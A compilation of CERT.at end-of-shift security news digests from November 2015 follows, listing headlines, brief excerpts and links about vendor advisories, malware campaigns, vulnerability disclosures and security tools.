=======================
= End-of-Shift report =
=======================
Timeframe: Dienstag 17-11-2015 18:00 − Mittwoch 18-11-2015 18:00
Handler: Robert Waldner
Co-Handler: Stephan Richter
*** Adobe releases out-of-band security patches - amazingly not for Flash ***
---------------------------------------------
ColdFusion, LiveCycle and Premiere get fixed ... Adobe says that it hasnt seen any evidence that these flaws are being exploited in the wild, but that users should patch anyway, just to be on the safe side - certainly before hackers reverse-engineer the updates and start abusing the bugs...
---------------------------------------------
http://www.theregister.co.uk/2015/11/17/adobe_releases_outofband_security_p…
*** Introducing Chuckle and the importance of SMB signing ***
---------------------------------------------
Digital signing is a feature of SMB designed to allow a recipient to confirm the authenticity of SMB packets and to prevent tampering during transit - this feature was first made available back in Windows NT 4.0 Service Pack 3. By default, only domain controllers require packets to be signed and this default behavior is usually seen in most corporate networks.
---------------------------------------------
https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2015/novem…
*** Team Cymru: Free tools for incident response ***
---------------------------------------------
We at Team Cymru would like to be helpful to incident response vendors in implementing the USG's growing security strategy. To that end, we have identified a few of our free community resources (and one commercial service) that would be most useful to IR.
---------------------------------------------
https://blog.team-cymru.org/2015/11/free-tools-for-incident-response-and-a-…
*** How two seconds become two days ***
---------------------------------------------
At 3:37PM PST, we had a power blip in one of our datacenters. In those two seconds, over 1,000 systems blinked offline. As a non-profit, we don't have all of those niceties such as hot-hot datacenters or those new fangled UPSes. Instead, we do it the old fashioned way, which means we are susceptible to...
---------------------------------------------
http://blog.shadowserver.org/2015/11/17/how-two-seconds-become-two-days/
*** A flaw in D-Link Switches opens corporate networks to hack ***
---------------------------------------------
A flaw in certain D-Link switches can be exploited by remote attackers to access configuration data and hack corporate networks. The independent security researcher Varang Amin and the chief architect at Elastica's Cloud Threat Labs Aditya Sood have discovered a vulnerability in the D-Link Switches belonging to the DGS-1210 Series Gigabit Smart Switches. The security experts revealed...
---------------------------------------------
http://securityaffairs.co/wordpress/42054/hacking/d-link-switches-flaw.html
*** Blast from the Past: Blackhole Exploit Kit Resurfaces in Live Attacks ***
---------------------------------------------
The year is 2015 and a threat actor is using the defunct Blackhole exploit kit in active drive-by download campaigns via compromised websites.Categories: ExploitsTags: drive-by downloadsexploitexploit kitwebsite(Read more...)
---------------------------------------------
https://blog.malwarebytes.org/exploits-2/2015/11/blast-from-the-past-blackh…
*** Google VirusTotal - now with autoanalysis of OS X malware ***
---------------------------------------------
Google just announced that its virus classification and auto-analysis service, VirusTotal, is now officially interested in OS X malware.
---------------------------------------------
http://feedproxy.google.com/~r/nakedsecurity/~3/buCfkbvoJqQ/
*** Nishang: A Post-Exploitation Framework ***
---------------------------------------------
Introduction I was recently doing an external penetration test for one of our clients, where I got shell access to Windows Server 2012(Internal WebServer sitting behind an IPS) with Administrative Privileges. It also appears to have an Antivirus installed on the system as everything I was uploading on to the machine was being deleted on...
---------------------------------------------
http://resources.infosecinstitute.com/nishang-a-post-exploitation-framework/
*** 10 dumb security mistakes sys admins make ***
---------------------------------------------
Security isn't merely a technical problem -- its a people problem. There's only so much technology you can throw at a network before dumb human mistakes trip you up.But guess what? Those mistakes are often committed by the very people who should know better: system administrators and other IT staff.[ Also on InfoWorld: 10 security mistakes that will get you fired. | Deep Dive: How to rethink security for the new world of IT. | Discover how to secure your systems with InfoWorlds...
---------------------------------------------
http://www.cio.com/article/3006147/security/10-dumb-security-mistakes-sys-a…
*** SANS Pentest Sumit: Evil DNS tricks by Ron Bowes - slide deck ***
---------------------------------------------
Things Im gonna talk about: * How to use DNS in pentesting * How to use DNSs indirect nature * DNS tunnelling (dnscat2)
---------------------------------------------
https://docs.google.com/presentation/d/1Jxh6PPO9JbUqXwOCTQFyA00uQoFMDBh-1Pe…
*** Cyber Security Assessment Netherlands 2015: cross-border cyber security approach necessary ***
---------------------------------------------
The CSAN has five Core Findings: * Cryptoware and other ransomware constitute the preferred business model for cyber criminals * Geopolitical tensions manifest themselves increasingly often in (impending) digital security breaches * Phishing is often used in targeted attacks and can barely be recognised by users * Availability becomes more important as alternatives to IT systems are disappearing * Vulnerabilities in software are still the Achilles heel of digital security
---------------------------------------------
https://www.ncsc.nl/english/current-topics/Cyber+Security+Assessment+Nether…
*** Inside the Conficker-Infected Police Body Cameras ***
---------------------------------------------
A Florida integrator who discovered the Conficker worm lurking in body cameras meant for police use takes Threatpost inside the story, including a frustrating disclosure with a disbelieving manufacturer.
---------------------------------------------
http://threatpost.com/inside-the-conficker-infected-police-body-cameras/115…
*** EMC VPLEX GeoSynchrony Default Log Level Lets Local Users View Passwords ***
---------------------------------------------
http://www.securitytracker.com/id/1034169
*** F5 security advisory: NTP vulnerability CVE-2015-5300 ***
---------------------------------------------
A man-in-the-middle attacker able to intercept network time protocol (NTP) traffic between a connecting client and an NTP server could use this flaw to force that client to make multiple steps larger than the panic threshold, effectively changing the time to an arbitrary value at any time.
---------------------------------------------
https://support.f5.com/kb/en-us/solutions/public/k/10/sol10600056.html?ref=…
*** Atlassian Hipchat XSS to RCE ***
---------------------------------------------
Topic: Atlassian Hipchat XSS to RCE Risk: Medium Text:Two issues exist in Atlassian’s HipChat desktop client that allow an attacker to retrieve files or execute remote code when a...
---------------------------------------------
https://cxsecurity.com/issue/WLB-2015110164
*** [HTB23272]: RCE and SQL injection via CSRF in Horde Groupware ***
---------------------------------------------
Product: Horde Groupware v5.2.10 Vulnerability Type: Cross-Site Request Forgery [CWE-352]Risk level: High Creater: http://www.horde.orgAdvisory Publication: September 30, 2015 [without technical details]Public Disclosure: November 18, 2015 CVE Reference: CVE-2015-7984 CVSSv2 Base Score: 8.3 [CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:H] Vulnerability Details: High-Tech Bridge Security Research Lab discovered three Cross-Site Request Forgery (CSRF) vulnerabilities in a popular collaboration...
---------------------------------------------
https://www.htbridge.com/advisory/HTB23272
*** Security Advisory - Information Leak Vulnerability in Huawei DSM Product ***
---------------------------------------------
There is a information leak vulnerability in DSM (Document Security Management) Product. The DSM does not clear the clipboard after data in a secure file opened using the DSM is copied and the secure file is closed. Data in the clipboard can be copied in common documents that do not use the DSM, leading to information leaks. (Vulnerability ID: HWPSIRT-2015-09009) Huawei has released software updates to fix these vulnerabilities.
---------------------------------------------
http://www1.huawei.com/en/security/psirt/security-bulletins/security-adviso…
*** Symantec Endpoint Protection Elevation of Privilege Issues SYM15-011 ***
---------------------------------------------
11/16/2015 - Assigned a new CVE ID, CVE-2015-8113 and Bugtraq ID 77585, to the SEP Client Binary Planting Partial Fix to differentiate between the original fix released in 12.1-RU6-MP1 and the updated issue and fix released in 12.1-RU6-MP3
---------------------------------------------
http://www.symantec.com/security_response/securityupdates/detail.jsp?fid=se…
*** Cisco Security Advisories ***
---------------------------------------------
*** Cisco Firepower 9000 USB Kernel Denial of Service Vulnerability ***
http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-…
---------------------------------------------
*** Cisco Firepower 9000 Command Injection at Management I/O Command-Line Interface Vulnerability ***
http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-…
---------------------------------------------
*** Cisco Firepower 9000 Persistent Cross-Site Scripting Vulnerability ***
http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-…
---------------------------------------------
*** Cisco Firepower 9000 Cross-Site Request Forgery Vulnerability ***
http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-…
---------------------------------------------
*** Cisco Firepower 9000 Series Switch Clickjacking Vulnerability ***
http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-…
---------------------------------------------
*** Cisco Firepower 9000 Arbitrary File Read Access Script Vulnerability ***
http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-…
---------------------------------------------
*** IBM Security Bulletins ***
---------------------------------------------
*** IBM Security Bulletin: Vulnerability in Apache Commons affects IBM WebSphere Application Server (CVE-2015-4852) ***
http://www.ibm.com/support/docview.wss?uid=swg21970575
---------------------------------------------
*** IBM Security Bulletin: IBM Sterling B2B Integrator has Cross Site Scripting vulnerabilities in Queue Watcher (CVE-2015-7431) ***
http://www.ibm.com/support/docview.wss?uid=swg21970676
---------------------------------------------
*** IBM Security Bulletin: Multiple vulnerabilities in IBM Runtime Environment Java Technology Edition, Version 1.5.0 and 1.7.0 affect IBM Flex System Manager (FSM) ***
http://www.ibm.com/support/docview.wss?uid=isg3T1022835
---------------------------------------------
*** IBM Security Bulletin: Multiple vulnerabilities in IBM Java SDK 7 affect IBM Systems Director Storage Control (CVE-2015-2613 CVE-2015-2601 CVE-2015-2625 CVE-2015-1931 ) ***
http://www.ibm.com/support/docview.wss?uid=isg3T1022936
---------------------------------------------
*** IBM Security Bulletin: IBM Tivoli Monitoring (CVE-2015-1829, CVE-2015-3183, CVE-2015-1283, CVE-2015-4947, CVE-2015-2808) ***
http://www.ibm.com/support/docview.wss?uid=swg21970056
---------------------------------------------
*** IBM Security Bulletin: Multiple vulnerabilities in IBM Runtime Environment Java Technology Edition, Version 1.5.0 and 1.7.0 affect IBM Flex System Manager (FSM) ***
http://www.ibm.com/support/docview.wss?uid=isg3T1022820
---------------------------------------------
=======================
= End-of-Shift report =
=======================
Timeframe: Montag 16-11-2015 18:00 − Dienstag 17-11-2015 18:00
Handler: Robert Waldner
Co-Handler: Stephan Richter
*** Cyber crooks actively hijacking servers with unpatched vBulletin installations ***
---------------------------------------------
Administrators of vBulletin installations would do well to install the latest vBulletin Connect updates as soon as possible, as cyber crooks are actively searching for servers running vulnerable versi...
---------------------------------------------
http://www.net-security.org/secworld.php?id=19113
*** Windows driver signing bypass by Derusbi ***
---------------------------------------------
Derusbi is an infamous piece of malware. The oldest identified version was compiled in 2008. It was used on well-known hacks such as the Mitsubishi Heavy Industries hack discovered in October 2011 or the Anthem hack discovered in 2015.
---------------------------------------------
http://www.sekoia.fr/blog/windows-driver-signing-bypass-by-derusbi/
*** Developers Are (still) From Mars, Infosec People (still) From Venus ***
---------------------------------------------
In March 2011, Brian Honan contributed to an issue of the INSECURE magazine with an article called "Management are from Mars, information security professional are from Venus". This title comes from the John Gray's worldwide bestseller where he presents the relations between men and women. Still today, we can reuse this subject for many purposes. Last week, I...
---------------------------------------------
https://blog.rootshell.be/2015/11/17/developers-mars-infosec-people-venus/
*** Why Algebraic Eraser may be the riskiest cryptosystem you've never heard of ***
---------------------------------------------
Researchers say there's a fatal flaw in proposed "Internet of things" standard.
---------------------------------------------
http://arstechnica.com/security/2015/11/why-algebraic-eraser-may-be-the-mos…
*** Cyber Security Assessment Netherlands 2015: cross-border cyber security approach necessary ***
---------------------------------------------
Cybercrime and digital espionage remain the largest threat to digital security in the Netherlands. Geopolitical developments like international conflicts and political sensitivities have a major impact on the scope of this threat. These are key findings from the Cyber Security Assessment Netherlands (CSAN), presented to the House of Representatives by State Secretary Dijkhoff in October, and now available in English.
---------------------------------------------
https://www.ncsc.nl/english/current-topics/news/cyber-security-assessment-n…
*** Gas- und Öl-Industrie: Leichte Ziele für Hacker ***
---------------------------------------------
Sicherheitsforscher warnen davor, dass Cyber-Kriminelle mit vergleichsweise einfachen Methoden einen Großteil der weltweiten Öl-Produktion kontrollieren könnten.
---------------------------------------------
http://heise.de/-2922912
*** Bugtraq: Open-Xchange Security Advisory 2015-11-17 ***
---------------------------------------------
PGP public keys allow to specify arbitrary "User ID" information that gets encoded to the public key and is presented to OX Guard users at "Guard PGP Settings". Public keys containing such content are still valid. Therefor they can be distributed and in case the uid field contains javascript code, they can be used to inject code.
---------------------------------------------
http://www.securityfocus.com/archive/1/536923
*** Cisco Firepower 9000 Unauthenticated File Access Vulnerability ***
---------------------------------------------
http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-…
*** D-Link DIR-645 UPNP Buffer Overflow ***
---------------------------------------------
Topic: D-Link DIR-645 UPNP Buffer Overflow Risk: High Text:## Advisory Information Title: Dlink DIR-645 UPNP Buffer Overflow Vendors contacted: William Brown <william.brown(a)dlink.com...
---------------------------------------------
https://cxsecurity.com/issue/WLB-2015110133
*** D-Link DIR-815 Buffer Overflow / Command Injection ***
---------------------------------------------
Topic: D-Link DIR-815 Buffer Overflow / Command Injection Risk: High Text:## Advisory Information Title: DIR-815 Buffer overflows and Command injection in authentication and HNAP functionalities Ve...
---------------------------------------------
https://cxsecurity.com/issue/WLB-2015110135
*** Huawei Security Notice - Statement on Seclists.org Revealing Security Vulnerability in Huawei P8 Smart Phone ***
---------------------------------------------
http://www.huawei.com/en/security/psirt/security-bulletins/security-notices…
=======================
= End-of-Shift report =
=======================
Timeframe: Freitag 13-11-2015 18:00 − Montag 16-11-2015 18:00
Handler: Robert Waldner
Co-Handler: Stephan Richter
*** BitLocker encryption can be defeated with trivial Windows authentication bypass ***
---------------------------------------------
Companies relying on Microsoft BitLocker to encrypt the drives of their employees computers should install the latest Windows patches immediately. A researcher disclosed a trivial Windows authentication bypass, fixed earlier this week, that puts data on BitLocker-encrypted drives at risk.Ian Haken, a researcher with software security testing firm Synopsys, demonstrated the attack Friday at the Black Hat Europe security conference in Amsterdam. The issue affects Windows computers that are part...
---------------------------------------------
http://www.cio.com/article/3005178/bitlocker-encryption-can-be-defeated-wit…
*** The November 2015 issue of our SWITCH Security Report is available! ***
---------------------------------------------
Dear Reader! A new issue of our monthly SWITCH Security Report has just been released. The topics covered in this report are: No safe harbour in the Land of the Free - EU Court of Justice restricts data transfer to...
---------------------------------------------
http://securityblog.switch.ch/2015/11/13/the-november-2015-issue-of-our-swi…
*** Websicherheit: Datenleck durch dynamische Skripte ***
---------------------------------------------
Moderne Webseiten erstellen häufig dynamischen Javascript-Code. Wenn darin private Daten enthalten sind, können fremde Webseiten diese auslesen. Bei einer Untersuchung von Sicherheitsforschern war ein Drittel der untersuchten Webseiten von diesem Problem betroffen.
---------------------------------------------
http://www.golem.de/news/websicherheit-datenleck-durch-dynamische-skripte-1…
*** Op-ed: (How) did they break Diffie-Hellman? ***
---------------------------------------------
Relax - its not true that researchers have broken the Diffie-Hellman key exchange protocol.
---------------------------------------------
http://arstechnica.com/security/2015/11/op-ed-how-did-they-break-diffie-hel…
*** More POS malware, just in time for Christmas ***
---------------------------------------------
VXers stuff evidence-purging malware in retailer stockings. Threat researchers are warning of two pieces of point of sales malware that have gone largely undetected during years of retail wrecking and now appear likely to earn VXers a haul over the coming festive break.
---------------------------------------------
http://go.theregister.com/feed/www.theregister.co.uk/2015/11/16/more_pos_ma…
*** Black Hat Europe 2015 slides ***
---------------------------------------------
briefings - november 12-13
---------------------------------------------
https://www.blackhat.com/eu-15/briefings.html
*** Choosing the Right Cryptography Library for your PHP Project: A Guide ***
---------------------------------------------
... conventional wisdom states that you almost certainly should not try to design your own cryptography. Instead, you should use an existing cryptography library. Okay, great. So which PHP cryptography library should I use? That depends on your exact requirements. Lets look at some good choices. (We wont cover any terrible choices.)
---------------------------------------------
https://paragonie.com/blog/2015/11/choosing-right-cryptography-library-for-…
*** Apple OS X authentication issue when recovering from sleep mode ***
---------------------------------------------
When Apple Remote Desktop is used in full screen mode and the remote connection is alive upon entering sleep mode, the text entered in the dialog box upon recovering from sleep mode is sent to the remotely connected host instead of the local host. This may result in command execution at the remote host.
---------------------------------------------
http://jvn.jp/en/jp/JVN56210048/index.html
*** Programmbibliothek libpng verlangt nach Sicherheitsupdates ***
---------------------------------------------
Eine Schwachstelle in libpng kann als Einfallstor für Angreifer dienen, um Anwendungen zum Absturz zu bringen.
---------------------------------------------
http://www.heise.de/newsticker/meldung/Programmbibliothek-libpng-verlangt-n…
*** Container: CoreOS gibt CVE-Service als Open Source frei ***
---------------------------------------------
Der Linux-Distributor CoreOS hat sein Container-Security-Werkzeug Clair als Open-Source-Software freigegeben. Das Tool ist in der Lage, jede einzelne Containerschicht nach Schwachstellen zu durchforsten und im Falle eines Fundes eine Meldung über die Art der Bedrohung zu übermitteln. Hierfür greift Clair auf die CVE-Datenbank (Common Vulnerabilities and Exposures) und ähnliche Ressourcen von Red Hat, Ubuntu, und Debian zurück. Clair hilft allerdings nicht, die...
---------------------------------------------
http://www.heise.de/newsticker/meldung/Container-CoreOS-gibt-CVE-Service-al…
*** LiME - Linux Memory Extractor ***
---------------------------------------------
Features Full Android memory acquisition Acquisition over network interface Minimal process footprint
---------------------------------------------
http://www.kitploit.com/2015/11/lime-linux-memory-extractor.html
*** DD4BC / Armada Collective: Erpressung mittels DDoS ***
---------------------------------------------
DD4BC / Armada Collective: Erpressung mittels DDoS16. November 2015Das ist mal wieder nichts wirklich Neues. Distributed Denial of Service Angriffe gibt es schon lange, das mag mit Turf-Fights in der Rotlicht-Szene angefangen haben, der Angriff auf Estland 2007 hat das Thema groß in die Presse gebracht, und spätestens seit den Angriffen der "Anonymous"-Bewegung sollte das Problem allgemein bekannt sein. Dazu gibt es auch einen Abschnitt in unserem letzten...
---------------------------------------------
http://www.cert.at/services/blog/20151116114639-1627.html
*** BlackBerry Enterprise Server Input Validation Flaw in Management Console Lets Remote Conduct Cross-Site Scripting Attacks ***
---------------------------------------------
http://www.securitytracker.com/id/1034154
*** D-link wireless router DIR-816L Cross-Site Request Forgery (CSRF) vulnerability ***
---------------------------------------------
Cross-Site Request Forgery (CSRF) vulnerability in the DIR-816L wireless router enables an attacker to perform an unwanted action on a wireless router for which the user/admin is currently authenticated.
---------------------------------------------
http://www.securityfocus.com/archive/1/536886
*** Debian: strongswan security update ***
---------------------------------------------
Tobias Brunner found an authentication bypass vulnerability in strongSwan, an IKE/IPsec suite. Due to insufficient validation of its local state the server implementation of the EAP-MSCHAPv2 protocol in the eap-mschapv2 plugin can be tricked into successfully concluding the authentication without providing valid credentials.
---------------------------------------------
https://lists.debian.org/debian-security-announce/2015/msg00303.html
*** Cisco Security Advisories ***
---------------------------------------------
*** Cisco Videoscape Distribution Suite Service Manager Information Disclosure Vulnerability ***
http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-…
---------------------------------------------
*** Cisco IOS Software Virtual PPP Interfaces Security Bypass Vulnerability ***
http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-…
---------------------------------------------
*** Cisco FireSIGHT Management Center Certificate Validation Vulnerability ***
http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-…
---------------------------------------------
*** Cisco Prime Collaboration Assurance Cross-Site Request Forgery Vulnerability ***
http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-…
---------------------------------------------
*** IBM Security Bulletins ***
---------------------------------------------
*** Apache Commons Vulnerability for handling Java object deserialization ***
http://www.ibm.com/support/docview.wss?uid=swg21970575
---------------------------------------------
*** IBM Security Bulletin: A vulnerability in GSKit affects IBM DataPower Gateways (CVE-2015-1788) ***
http://www.ibm.com/support/docview.wss?uid=swg21969271
---------------------------------------------
*** IBM Security Bulletin: Certain cookies missing Secure attribute in IBM DataPower Gateways (CVE-2015-7427) ***
http://www.ibm.com/support/docview.wss?uid=swg21969342
---------------------------------------------
*** Security Bulletin: Vulnerabilities in OpenSSL affect IBM System Networking RackSwitch (CVE-2015-1788, CVE-2015-1789, CVE-2015-1792) ***
http://www.ibm.com/support/entry/portal/docdisplay?lndocid=MIGR-5098801
---------------------------------------------
*** IBM Security Bulletin: IBM Cúram Social Program Management contains an Apache Batik Vulnerability (CVE-2015-0250) ***
http://www.ibm.com/support/docview.wss?uid=swg21970112
---------------------------------------------
*** IBM Security Bulletin: Multiple vulnerabilities in current releases of the IBM SDK, Java Technology Edition ***
http://www.ibm.com/support/docview.wss?uid=swg21969225
---------------------------------------------
*** IBM Security Bulletin: Vulnerability in qemu-kvm affects IBM SmartCloud Provisioning for IBM Software Virtual Appliance ***
http://www.ibm.com/support/docview.wss?uid=swg21968929
---------------------------------------------
*** IBM Security Bulletin: Vulnerability in FUSE affects PowerKVM (CVE-2015-3202) ***
http://www.ibm.com/support/docview.wss?uid=isg3T1022878
---------------------------------------------
*** IBM Security Bulletin: Lotus Protector for Mail Security affected by Opensource PHP Vulnerabilities (CVE-2015-6836 CVE-2015-6837 CVE-2015-6838) ***
http://www.ibm.com/support/docview.wss?uid=swg21968353
---------------------------------------------
*** IBM Security Bulletin: GPFS security vulnerabilities in IBM SONAS (CVE-2015-4974 and CVE-2015-4981) ***
http://www.ibm.com/support/docview.wss?uid=ssg1S1005425
---------------------------------------------
*** IBM Security Bulletin: Vulnerability in Mozilla gdk-pixbuf2 affects PowerKVM (CVE-2015-4491) ***
http://www.ibm.com/support/docview.wss?uid=isg3T1022833
---------------------------------------------
*** Vulnerability in bind affects AIX (CVE-2015-5722) ***
http://www.ibm.com/support/
---------------------------------------------
=======================
= End-of-Shift report =
=======================
Timeframe: Donnerstag 12-11-2015 18:00 − Freitag 13-11-2015 18:00
Handler: Robert Waldner
Co-Handler: Stephan Richter
*** Using Facebook to log in - safe or not? ***
---------------------------------------------
Open up your favorite web site and you can see what this is about right away. There are in many cases two options, an ordinary log-in and "Log in with Facebook". Have you been using the Facebook option? It is quite convenient, isn't it? I was talking to a journalist about privacy a while ago...
---------------------------------------------
http://safeandsavvy.f-secure.com/2015/11/12/using-facebook-to-log-in-safe-o…
*** MIG Mozilla InvestiGator ***
---------------------------------------------
Search through your infrastructure in real-time from the command line
---------------------------------------------
https://jve.linuxwall.info/ressources/taf/LISA15/
*** ZipInputStream Armageddon ***
---------------------------------------------
Again, again, again .. and again these bugs are turning up because of the general lack of validation occurring on the ZIP contents. In most cases this is probably due to the fact that developers are making assumptions that these ZIP files are not being tampered with, and therefore dont really consider the ramifications.
---------------------------------------------
http://rotlogix.com/2015/11/12/zipinputstream-armageddon/
*** botfrei.de: Werbeblocker-Sanktionen "der falsche Weg" ***
---------------------------------------------
Das "Anti-Botnet Beratungszentrums" botfrei.de und der Betreiber, der eco Verband der Internetwirtschaft, halten Online-Werbung für wichtig. Sanktionen gegen Werbeblocker würden aber wichtige Nutzerinteressen unberücksichtigt lassen.
---------------------------------------------
http://heise.de/-2920022
*** One BadBarcode Spoils Whole Bunch ***
---------------------------------------------
At PacSec 2015, researchers demonstrated attacks using poisoned barcodes scanned by numerous keyboard wedge barcode scanners to open a shell on a machine and virtually type control commands.
---------------------------------------------
http://threatpost.com/one-badbarcode-spoils-whole-bunch/115362/
*** Google Reconnaissance, Sprinter-style, (Fri, Nov 13th) ***
---------------------------------------------
When doing security assessments or penetration tests, theres a significant amount of findings that you can get from search engines. For instance, if a client has sensitive information or any number of common vulnerabilities, you can often find those with a Google or Bing search, without sending a single packet to the clients infrastructure. This concept is called google dorking, and was pioneered by Johnny Long back in the day (he has since moved on to other projects see...
---------------------------------------------
https://isc.sans.edu/diary.html?storyid=20375&rss
*** Researchers Discover Two New Strains of POS Malware ***
---------------------------------------------
Two new and different strains of point of sale malware have come to light, including one that's gone largely undetected for the past five years.
---------------------------------------------
http://threatpost.com/researchers-discover-two-new-strains-of-pos-malware/1…
*** Spring Social Core Vulnerability Disclosure ***
---------------------------------------------
Today we would like to announce the discovery of a vulnerability in the Spring Social Core library. Spring Social provides Java bindings to popular service provider APIs like GitHub, Facebook, Twitter, etc., and is widely used by developers. All current versions (1.0.0.RELEASE to 1.1.2.RELEASE) of the library are affected by this vulnerability.
---------------------------------------------
https://blog.srcclr.com/spring-social-core-vulnerability-disclosure/
*** Unitronics VisiLogic OPLC IDE Vulnerabilities ***
---------------------------------------------
This advisory was originally posted to the US-CERT secure Portal library on November 3, 2015, and is being released to the NCCIC/ICS-CERT web site. This advisory provides mitigation details for vulnerabilities in Unitronics VisiLogic OPLC IDE.
---------------------------------------------
https://ics-cert.us-cert.gov/advisories/ICSA-15-274-02
*** Security Advisory - App Validity Check Bypass Vulnerability in Huawei P7 Smartphone ***
---------------------------------------------
http://www.huawei.com/en/security/psirt/security-bulletins/security-advisor…
*** Security Notice - Statement on Black Hat Europe 2015 Revealing Security Vulnerability in Huawei P7 Smart Phone ***
---------------------------------------------
http://www.huawei.com/en/security/psirt/security-bulletins/security-notices…
*** DFN-CERT-2015-1761: Jenkins: Mehrere Schwachstellen ermöglichen u.a. das Ausführen beliebigen Programmcodes ***
---------------------------------------------
https://portal.cert.dfn.de/adv/DFN-CERT-2015-1761/
*** Cisco AnyConnect Secure Mobility Client Arbitrary File Move Vulnerability ***
---------------------------------------------
http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-…
*** Cisco IOS Software Tunnel Interfaces Security Bypass Vulnerability ***
---------------------------------------------
http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-…
*** Cisco Aironet 1800 Series Access Point SSHv2 Denial of Service Vulnerability ***
---------------------------------------------
http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-…
=======================
= End-of-Shift report =
=======================
Timeframe: Mittwoch 11-11-2015 18:00 − Donnerstag 12-11-2015 18:01
Handler: Robert Waldner
Co-Handler: Stephan Richter
*** Distributed Vulnerability Search - Told via Access Logs ***
---------------------------------------------
Sometimes just a few lines of access logs can tell a whole story: Many ongoing attacks against WordPress and Joomla sites use a collection of known vulnerabilities in many different plugins, themes and components. This helps hackers maximize the number of sites they can compromise. Google Dorks Do you ever think about how hackers find...
---------------------------------------------
https://blog.sucuri.net/2015/11/distributed-vulnerability-search-told-via-a…
*** Latest Android phones hijacked with tidy one-stop-Chrome-pop ***
---------------------------------------------
Chinese researcher burns exploit for ski trip. PacSec: Googles Chrome for Android has been popped in a single exploit that could lead to the compromise of any handset.
---------------------------------------------
http://go.theregister.com/feed/www.theregister.co.uk/2015/11/12/mobile_pwn2…
*** Samsung S6 calls open to man-in-the-middle base station snooping ***
---------------------------------------------
Their cheap man-in-the-middle attack requires an OpenBTS base station to be established and located near target handsets. Handsets will automatically connect to the bogus station. The malicious base station then pushes firmware to the phones baseband processor (the chip that handles voice calls, and which isnt directly accessible to end users). ... The Register would speculate that since the Qualcomm silicon in question isnt unique to Samsung kit, other researchers are probably setting to work...
---------------------------------------------
http://www.theregister.co.uk/2015/11/12/mobile_pwn2own1/
*** Geschäftsgeheimnisse: Sicherheitsforscher warnt vor TTIP ***
---------------------------------------------
Das Freihandelsabkommmen TTIP hat eine weitere Gegnergruppe: IT-Sicherheitsforscher. Das jedenfalls sagt René Pfeiffer, Organisator der Deepsec in Wien. Er fürchtet, dass Informationen über Sicherheitsrisiken damit noch stärker unterbunden werden.
---------------------------------------------
http://www.golem.de/news/geschaeftsgeheimnisse-sicherheitsforscher-warnt-vo…
*** Outlook-Probleme: Microsoft fixt Sicherheits-Update für Windows ***
---------------------------------------------
Microsoft hat ein fehlerhaftes Update zurückgezogen und durch eine gefixte Version ersetzt. Nach der Installation soll Outlook nicht mehr abstürzen. Doch es gibt noch weitere Probleme.
---------------------------------------------
http://heise.de/-2919456
*** Pentesting SAP Applications : An Introduction ***
---------------------------------------------
Introduction to SAP SAP (Systems-Applications-Products) is a software suite that offers standard business solutions; it is used by thousands of customers across the globe to manage their business. In other words, SAP systems provide the capability to manage financial, asset, and cost accounting, production operations and materials, personnel and many more tasks. Before we jump...
---------------------------------------------
http://resources.infosecinstitute.com/pen-stesting-sap-applications-part-1/
*** EMV Protocol Fuzzer ***
---------------------------------------------
The world-wide introduction of the Europay, MasterCard and Visa standard (EMV), to facilitate communication between smartcards and EMV-enabled devices, such as point-of-sale (POS) terminals and automatic teller machines (ATMs), has altered the security landscape of the daily markets. Surprisingly limited public research exists addressing security aspects of hardware and software specific implementations. This is something we wanted to put right and therefore started a new research programme to...
---------------------------------------------
https://labs.mwrinfosecurity.com/blog/2015/11/11/emv-protocol-fuzzer/
*** Got a time machine? Good, you can brute-force 2FA ***
---------------------------------------------
Security researcher Gabor Szathmari says the problem is that if your 2FA tokens depend on the network time protocol (NTP), its too easy for a sysadmin to put together an attackable implementation. As he explains in two posts.., if an attacker can trick NTP, they can mount a brute-force attack against the security tokens produced by Google Authenticator (the example in the POC) and a bunch of other Time-based One-time Password Algorithm-based (TOTP) 2FA mechanisms.
---------------------------------------------
http://www.theregister.co.uk/2015/11/12/got_a_time_machine_good_you_can_bru…
*** Spam and phishing in Q3 2015 ***
---------------------------------------------
The dating theme is typical for spam emails, but in the third quarter of 2015 we couldn't help but notice the sheer variety appearing in these types of mailings. We came across some rather interesting attempts to deceive recipients and to bypass filters, as well as new types of spam mailings that were bordering on fraud.
---------------------------------------------
https://securelist.com/analysis/quarterly-spam-reports/72724/spam-and-phish…
*** Oracle WebLogic Server: CVE-2015-4852 patched, (Thu, Nov 12th) ***
---------------------------------------------
Lost in the hoopla around Microsoft and Adobe patch Tuesday was a critical patch released by Oracle which addressed CVE-2015-4852. CVE-2105-4852is a critical vulnerability in Apache Commons which affects Oracle WebLogic Server. This vulnerability permits remote exploitation without authentication and should be patchedas soon as practical. More information can be found at the Oracle Blog. -- Rick Wanner MSISE - rwanner at isc dot sans dot edu - http://namedeplume.blogspot.com/ -...
---------------------------------------------
https://isc.sans.edu/diary.html?storyid=20369&rss
*** Cisco Cloud Web Security DNS Hijack, (Thu, Nov 12th) ***
---------------------------------------------
We have received a report that a domain critical in delivering the Cisco Cloud Web Security product had for a while earlier today been hijacked. The report indicates thatthe DNS entrys forscansafe.net were hijacked and pointed to 208.91.197.132, a site which both VirusTotal and Web of Trust indicate has a reputation for delivering malware.">Guidance that has been provided to customers is that the issue has been resolved but that the TTL on the DNS entries are 48 hours so it will take a...
---------------------------------------------
https://isc.sans.edu/diary.html?storyid=20371&rss
*** Volatility 2.5 released ***
---------------------------------------------
This is the first release since the publication of The Art of Memory Forensics! It adds support for Windows 10 (initial), Linux kernels 4.2.3, and Mac OS X El Capitan. Additionally, the unified output rendering gives users the flexibility of asking for results in various formats (html, sqlite, json, xlsx, dot, text, etc.) while simplifying things for plugin developers. In short, less code...
---------------------------------------------
